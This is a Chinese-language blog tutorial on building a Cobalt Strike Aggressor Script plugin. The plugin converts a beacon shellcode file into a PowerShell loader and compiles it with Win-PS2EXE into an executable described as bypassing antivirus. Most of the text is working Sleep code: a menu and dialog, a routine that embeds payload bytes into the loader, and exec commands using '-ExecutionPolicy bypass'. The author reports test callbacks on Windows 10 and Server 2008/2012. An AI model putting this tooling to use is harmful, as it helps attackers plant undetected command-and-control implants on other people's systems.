前言

在接触到Cobalt Strike的时候就知道有各种插件，想象着那天也可以自己学习编写一个。在之前分析Cobalt Strike powershell木马的时候，正好看到了Win-PS2EXE 项目用来编译为exe，免杀效果还不错且大小只有几十KB。即如此，何不利用Aggressor Script 编写一个cna脚本用来实现Win-PS2EXE编译为exe？

Sleep 语言

我们都知道Cobalt Strike的插件现在都由Aggressor Script语言编写，由Sleep语言解析。对于Sleep语言网上学习的资料比较少，还好这个语言学起来也比较简单。
先下载Sleep语言 http://sleep.dashnine.org/download/sleep.jar
命令java -jar sleep.jar 即可启用。

image.png

而后我们新建一个cna文件，cna是Aggressor Script脚本的后缀。
在cna文件里编写sleep语言，load该cna文件即可执行。

Sleep 语法

Sleep语法手册：http://sleep.dashnine.org/manual/
这里着重看一下我在编写powershell免杀时着重用到的基础语法。和php的一些函数很类似。

mkdir
global
sub
exec
byteAt

还有一些不太一样的地方，比如运算符的两边必须加空格。

$int = 3;
println($int - 1);

否则就异常。

image.png

菜单的编写

创建一个自定义菜单

menubar("powershell免杀","test");  # 注册一级菜单
popup test {
    item("&生成exe",{dialog_test()});  # 子菜单，点击时调用dialog_test函数
}

Cobalt Strike 加载cna脚本后，效果如下

image.png

输入框的编写

现在编写dialog_test函数，用来用户的输入

menubar("powershell免杀","test");  # 一级菜单
popup test {
    item("&生成exe",{dialog_test()});  # 子菜单，点击时调用dialog_test函数
}
sub dialog_test {
    $info = dialog("powershell bypass av",%(ps2exe => "ps2exe.ps1",bin => "payload.bin",payload => "payload_cs.ps1",version => "",output_exe => "bypass.exe"),&show); 
    #第一个是菜单的名字，第二个是我们定义的菜单显示内容的默认值，第三个参数是我们回调函数，触发show函数的时候显示，并将值传递
    drow_file($info,"bin","Choose: default payload.bin");
    drow_text($info, "payload", "生成ps1"); # drow_text文本框的输入
    drow_combobox($info, "version", "Version: ", @("powershell 4.0", "powershell 2.0"));
    drow_text($info,"output_exe","输出地址："); 
    dbutton_action($info,"点击生成！"); # dbutton_action将操作按钮添加到dialog，回调函数
    dialog_show($info); # 显示文本输入框
}
sub show {
    println("\n加载bin文件：".$3["bin"]."\n输出payload文件：".$3["payload"]."\n版本是：".$3["version"]."\n输出exe地址：".$3["output_exe"]);
    show_message("\n加载bin文件：".$3["bin"]."\n输出payload文件：".$3["payload"]."\n版本是：".$3["version"]."\n输出exe地址：".$3["output_exe"]);
}

定义diolog数据模型，会有三个函数传递给shou方法

$1 为dialog的引用
$2 按钮的名称
$3 对话框输入的值

show_message以弹框的方式显示消息，println则会显示在Script Console中。
效果如下：

image.png

powershell免杀

免杀的生成还是借用的 Powershell免杀从入门到实践，利用powershell加载恶意bin文件，生成ps1文件，再借助PS2EXE编译为exe。
生成powershell_cs.ps1 文件，用的是正则匹配加载器powershell_load.ps1文件，将[System.IO.File]::ReadAllBytes('payload.bin')直接替换为读取bin文件的字符。
代码如下

global('$char_code');
global('$new_strs');
sub payload_bin_to_ps1 {
    $in = openf('payload.bin');
    $data = readb($in, -1);

    for ($x = 0; $x < strlen($data); $x++)
    {
        $shellcode = (byteAt($data, $x) . ",");
        $char_code = $char_code.$shellcode;
    }
    $char_code = left($char_code, int(strlen($char_code)) - 1);
    $org_file = 'powershell_load.ps1';
    $handle = openf($org_file);
    while $text (readln($handle)){ 
        $rep = replace($text, 'acode.*=.*', 'acode='.$char_code)."\n";
        $new_strs = $new_strs.$rep;
    }
    $filestring = right($new_strs, int(strlen($new_strs)) - 1);
    $out =  openf(">$payload_file_ps1");
    writeb($out, $filestring);
    closef($out);
    closef($in);
    $new_strs = '';
    $char_code = '';
    
}

编译为exe则直接用exec命令。

$process = exec('powershell.exe -ExecutionPolicy bypass  -command "F:\cstemp\.\ps2exe.ps1 -inputFile F:\cstemp\powershell_load.ps1 -outputFile F:\cstemp\aaa.exe -noConsole -runtime40" ');
println($process);
@data = readAll($process);
println(@data)
closef($process);

因为本身是利用的powershell 4.0，利用.NET Framework 4.x 环境编译为exe，所以在win10、server 2012 上都可以正常上线。

image.png

但如果还想在server 2008 上上线，就需要使用-runtime20选项，意思是利用powershell 2.0编译为exe

image.png

当我在win10上使用-runtime20选项时，程序直接处于等待状态。

image.png

只能手动去结束这个进程。尝试多次无果。
但测试发现换一个命令就可以正常执行结束，且没有多余的进程。

$process = exec('cmd.exe /c echo F:\cstemp\.\ps2exe.ps1 -inputFile F:\cstemp\powershell_load.ps1 -outputFile F:\cstemp\bbb.exe -noConsole -runtime20 | powershell -');
@data = readAll($process);
println(@data)
closef($process);

在server 2008上测试可上线。